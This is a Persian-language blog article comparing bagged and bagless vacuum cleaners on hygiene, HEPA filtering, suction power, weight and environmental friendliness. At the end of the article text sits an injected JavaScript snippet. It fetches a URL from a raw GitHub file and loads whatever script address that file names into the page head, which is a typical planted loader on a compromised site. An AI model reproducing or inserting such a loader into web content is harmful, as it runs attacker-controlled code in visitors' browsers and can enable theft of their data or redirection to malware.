دسته‌بندی نشده

مقایسه و بررسی جاروبرقی های کیسه دار و مخزن دار

خرید جاروبرقی ممکن است کاری اسان و بی اهمیت به نظر برسد ولی در حقیقت فوق العاده چالش بر انگیز و بسیار پر اهمیت است. این محصولات در قیمت های متفاوت و با کارکرد های مختلف عرضه می شوند و میزان تاثیر نظافت و تمییز کنندگی که در محیط ایجاد می کنند بسیار متفاوت می باشد. علاوه بر این موارد در طراحی و اندازه ه نیز تفاوتی بسیار زیاد با یکدیگر دارند. اما مهم ترین و اصلی ترین تفاوتی که جاروبرقی ها با یکدیگر دارند کیسه دار و یا مخزن دار بودن ان ها می باشد. تصمیم گیری در این مورد می تواند انتخاب و تصمیم گیری را بسیار اسان تر و محدود تر کند. 

جاروبرقی کیسه دار

جاروبرقی های کیسه دار مدت های زیادی است که در بازار موجود است و تاریخچه ای طولانی در نظافت و نمییزکنندگی محیط دارند. این دستگاه ها دارای قدرت مکش کافی و مناسب برای کشیدن گرد و غبار از سطوح مختلف به داخل کیسه می باشد. برخی از جارو های کیسه ای نیز از فیلتر های هوا با کارکرد عالی و یا فیلتر هپا HEPA استفاده می کنند. مشکلی که در بیشتر جاروبرقی های کیسه دار وجود دارد حجم بزرگ  و وزن سنگین ان ها می باشد. البته با پیشرفت تکنولوژی این مشکل تا حدی بر طرف شده است و می توانید جارو برقی های نسبتا کم حجم تر را نیز در بازار پیدا کنید. تعداد تولید شده و مدل های موجود در بازار از این نوع کیسه دار بسیار بیشتر است و به دلیل کارایی بهتر و کیفیت بالاتری که دارند مصرف کننده بیشتری نیز به نسبت مدل های مخزنی دارند. کیسه این جارو برقی ها در دو نوع یکبار مصرف و چندبار مصرف تولید و عرضه می شوند. موتور این جاروبرقی ها به دلیل بهرمند بودن از فیلتر های مختلف گرد و غبار کمتری را جذب خود می کنند و همین امر باعث طولانی شدن کارکرد موتور و طول عمر زیاد برای ان می شود. 

مزایا استفاده از جاروبرقی کیسه دار

کاملا بهداشتی و بدون باکتری

در این جارو برقی نیازی به شستشو دستگاه وجود ندارد و تمامی گرو غبار و زباله ها داخل کیسه سر دار جمع می شوند. با توجه به اینکه جنس پارچه کیسه های جاروبرقی ها معمولا فوق العاده محکم و 5 لایه است هیچگونه گرد و غباری از ان خارج نمی شود. علاوه بر این در این جارو ها معمولا فیلتر های بهداشتی استفاده می شود که از ایجاد باکتری و پخش الودگی به خارج دستگاه و محیط کاربران جلوگیری می کند. با توجه به موارد نام برده شده این دستگاه های کاملا بهداشتی و ضد باکتری می باشند بنابراین مناسب برای افراد حساس و کسانی است که الرژی دارند. 

سازگار با فیلتر بهداشتی هپا و فیلتر های مختلف

جاروبرقی های کیسه دار را می توان به عنوان محصولاتی سازگار با محیط نام برد. این محصولات به دلیل بهرمندی از فیلتر هپا و همچنین فیلتر های مخصوص داخل موتور بهداشت کامل را برای محیط ایجاد می کنند و طول عمر بیشتری را به دستگاه و موتور ان می بخشند. فیلتر هپا از جدید ترین فیلتر های بهداشتی موجود در بازار است که می تواند 99.97 درصد از باکتر ها و ذرات معلق موجود در هوا را جذب خود کند و محیطی کاملا بهداشتی را هنگام جارو کشیدن ایجاد کند. داخل موتور جاروبرقی های کیسه دار نیز از فیلتر های مخصوص استفاده می شود که از جذب گرد و غبار به داخل موتور جلوگیری می کنند. این فیلتر ها طول عمر زیادی را به دستگاه و موتور ان می دهند و باعث افزایش کارکرد ان ها می شوند. 

اکنون به بررسی چند مورد از معایت و اشکالات موجود در جارو برقی های کیسه دار خواهیم پرداخت. 

از اولین و مهم ترین معایبی که در جاروبرقی های کیسه دار وجود دارد کاهش قدرت مکش ان ها هنگام پر شدن کیسه می باشد. البته باید به این نکته توجه داشت که با پیشرفت تکنولوژی این مشکل تا حدی بر طرف شده است و جارو ها حتی پس از پر شدن کیسه نیز تا حدی قدرت و کارایی خود را حفظ می کنند اما این مشکل هنوز وجود دارد و کارایی و قدرت اولیه پس از پر شدن تا حدی کاهش می یابد. علاوه بر افت کارکرد پس از پر شدن کیسه, کیسه های بکار رفته روی جارو ها در مواردی با خرابی و یا پاره شدن مواجه می شوند که البته با جایگزین کردن یک کیسه دیگر به اسانی قابل برطرف شدن می باشد. 

جاروبرقی های بدون کیسه یا مخزن دار

همانطور که از نام ان پیداست در این جارو برقی ها به جای استفاده از کیسه برای گرد و غبار ان از مخزن در اندازه های مختلف استفاده می شود. این نوع از جاروبرقی ها به دلیل قدرت مکش بسیار بالایی که دارند مورد توجه کاربران قرار می گیرد و یکی از دلایل اولیه خرید این مدل ها قدرت بالا در جذب زباله و گرد و غبار می باشد. 

مزایا مختلف استفاده از جارو های مخزن دار

قدرت مکش بسیار بالا

در این جارو برقی ها معمولا از موتور های بسیار قدرتمند و قوی استفاده می شود و به همین دلیل اینگونه دستگاه ها مکش بسیار زیاد و عملکردی عالی در جمع اوری گرد و غبار و زباله ها دارند. با مکش بالا این جارو ها می توان به اسانی تمامی زباله ها و الودگی های موجود روی سطوح مختلف از جمله سرامیک و فرش ها را جمع اوری کرد. 

اندازه جمع و جور و وزن مناسب

جارو های مخزنی معمولا در اندازه های مختلف کوچک و بزرگ در بازار موجود می باشند. شرکت های تولید کنند امروزه این مدل از جارو ها را در اندازه های بسیار کوچک و جمع و جور تولبد می کنند این جارو ها معمولا وزن بسیار سبک و کمی دارند بنابراین جابجایی و حمل ان ها در اتاق هنگام جارو کشیدن بسیار اسان خواهد بود.

کاملا مناسب و سازگار با محیط زیست

جارو برقی های مخزن دار به دلیل عدم استفاده از کیسه با محیط زیست سازگاری بیشتر و بالاتری دارند. با توجه به این مورد که دیگر نیازی در دور انداختن کیسه های یک بار مصرف جارو برقی یا کیسه های پارچه ای پس از پاره شدن نمی باشد و زباله های موجود درمخزن به صورت مستقیم خالی می شود می توان گفت سازگاری این محصولات با محیط زیست بالا تر از نوع کیسه دار می باشد. 

معایت جارو های مخزنی

در این جارو برقی ها معایت و اشکالاتی وجود دارد که با توجه به ان ها جاروبرقی های کیسه دار از برتری و ویژگی های مثبت بیشتری نسبت به ان ها برخوردار می باشند. در این جارو ها به دلیل نداشتن کیسه و نیاز به شستشو و خالی کردن مخزن به صورت مستقیم کاربران در معرض الودگی و گرد و غبار بیشتری قرار دارند. این جاروبرقی ها به دلیل نداشتن فیلتر های چندان زیاد و کاربردی و نفوذ الودگی و گرو و غبار به داخل موتور ممکن است در موارد زیادی با خرابی موتور و یا حتی سوختن ان روبرو شوند. در کل این جارو ها از نظر بهداشتی و هم از نظر زمانی به دلیل نیاز به شستشو مرتب مخزن و خالی کردن ان چندان بصرفه و مناسب نمی باشد و تنها به دلیل قدرت بالایی که در جمع اوری زباله دارند می توان ان ها را برای تمیز کنندگی های قوی مورد استفاده قرار داد.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *